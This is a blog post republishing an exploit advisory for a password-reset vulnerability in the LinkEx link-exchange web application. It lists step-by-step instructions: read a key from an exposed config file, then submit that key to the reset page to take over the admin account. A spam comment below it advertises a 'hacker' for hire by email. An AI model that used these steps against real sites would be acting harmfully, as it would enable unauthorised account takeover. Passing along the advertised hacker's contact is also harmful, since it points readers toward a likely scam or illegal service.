Sunday, 23 March 2014

LinkEX (All Versions) Password Reset Vulnerability

# Exploit Title: LinkEx Password Reset Vulnerability
# Date: 15/01/2014
# Exploit Author: N B Sri Harsha
# Vendor Homepage: http://linkex.dk/
# Version: Every Version


LinkEx Is A Open Source Web Application For Exchanging link ,  Which Most Of The Porn Sites Uses it ,

2) Click On Forgot password and enter the captcha
3) Go Here >> site.com/linkex/data/config/config
Note down the " key " parameter
ie :- "key";s:32:"36d1dd98c84e643236216449e96bed0d"
4) Now Use the Key Here >> site.com/linkex/?page=resetpassword&key=[key]
5) Thats It U Will Asked For New Username And Password


So It Was My First Webapp Exploit , And It Got Me Some Fame Too :D

http://www.exploit-db.com/exploits/32561/
http://packetstormsecurity.com/files/125917/LinEx-Password-Reset.html
http://1337day.com/exploit/22083

And many More  :- click here  :D :)

1 comment:

  1. I never thought I will come in contact with a real and potential hacker until I knew   brillianthckers800 at Gmail and he delivered a professional job,he is intelligent and understanding to control jobs that comes his way
    Contact him and be happy

    ReplyDelete